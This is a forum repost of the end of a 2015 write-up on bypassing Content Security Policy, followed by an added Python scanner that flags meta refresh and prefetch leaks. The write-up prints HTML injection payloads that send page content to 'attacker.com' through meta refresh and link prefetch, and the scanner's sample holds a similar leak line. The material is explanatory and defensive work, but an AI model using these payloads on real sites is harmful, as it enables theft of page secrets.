Nytro Posted November 26, 2015

(the injected part is "><meta http-equiv="refresh" content='0;url=http://attacker.com/?)

Since browsers can handle only one redirection, they have to pick only one of the three. Some browsers use the first one and some use the last one, but never the middle one. That is troublesome because we only care about the middle one.

Now think about it: does CSP really cover all the possible ways to fetch resources? Another no.

HTTPLeaks is a project that aims to enumerate all possible ways browsers leak requests. They can be something specific to browsers, features defined by new specifications and whatnot. The most important thing is that some of them will not be caught by CSP. In the attack I used prefetch from Resource Hints.

Finally, we just need to prevent the intended redirection so that our prefetch request will not be dropped. This can be done using the javascript: pseudo-protocol, as browsers refuse to navigate to it in meta refresh. Now everything is set, and the final payload:

javascript:"><link rel=prefetch href='//attacker.com/?...

Hooray! Access granted. CSP: 0.5 - Attacker 2.5. Fatality.

You can find the original report from HackerOne.

Takeaway

A proper policy can significantly reduce the chance of XSS
Beware of the nonce pitfall
Content exfiltration may be the Achilles' heel of CSP
All in all, CSP does not replace input validation

Source: http://blog.innerht.ml/csp-2015/
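As an added example (not from the original post or from innerht.ml), the following Python scanner audits rendered HTML for the two element types this bypass relies on, meta refresh and resource-hint links, and reports any whose target is a javascript: URL or an origin outside an allowlist, since the CSP versions discussed here do not govern those requests. The names (LeakScanner, scan, the sample page and its hosts) are hypothetical and the sample HTML is constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Resource hints and meta refresh issue requests that the CSP versions discussed
# on this page do not restrict, so they need an explicit audit.
HINT_RELS = {"prefetch", "dns-prefetch", "preconnect", "prerender"}

def _origin(url, page_origin):
    # Resolve the target's origin; scheme-relative '//host' inherits the page scheme.
    p = urlsplit(url)
    scheme = p.scheme.lower() or urlsplit(page_origin).scheme
    return f"{scheme}://{p.netloc.lower()}" if p.netloc else page_origin

class LeakScanner(HTMLParser):
    # Collects (element, target, reason) for elements pointing off the allowlist.
    def __init__(self, page_origin, allowed_origins):
        super().__init__()
        self.page_origin = page_origin
        self.allowed = {page_origin, *allowed_origins}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # HTMLParser lowercases names
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # content is "<seconds>;url=<target>"; keep only the target part
            rest = a.get("content", "").split(";", 1)[-1]
            self._check("meta refresh", rest.split("=", 1)[-1])
        elif tag == "link" and HINT_RELS & set(a.get("rel", "").lower().split()):
            self._check(f"link rel={a['rel']}", a.get("href", ""))

    def _check(self, kind, url):
        url = url.strip().strip("'\"")
        if urlsplit(url).scheme.lower() == "javascript":
            self.findings.append((kind, url, "javascript: target"))
        elif (origin := _origin(url, self.page_origin)) not in self.allowed:
            self.findings.append((kind, url, f"origin {origin} not allowed"))

def scan(html, page_origin, allowed_origins=()):
    """Return (element, target, reason) findings for one rendered page."""
    s = LeakScanner(page_origin, allowed_origins)
    s.feed(html)
    return s.findings

# Constructed sample: two benign elements, an injected prefetch, a javascript: refresh.
SAMPLE = """<meta http-equiv="refresh" content="0;url=https://example.com/home">
<link rel="prefetch" href="https://cdn.example.com/app.js">
<link rel=prefetch href='//attacker.example/?leak=secret-token'>
<meta http-equiv="refresh" content="0;url=javascript:void(0)">"""
```

Running scan over server-side rendered output in a test suite catches injected refresh and hint elements that a CSP report would never show.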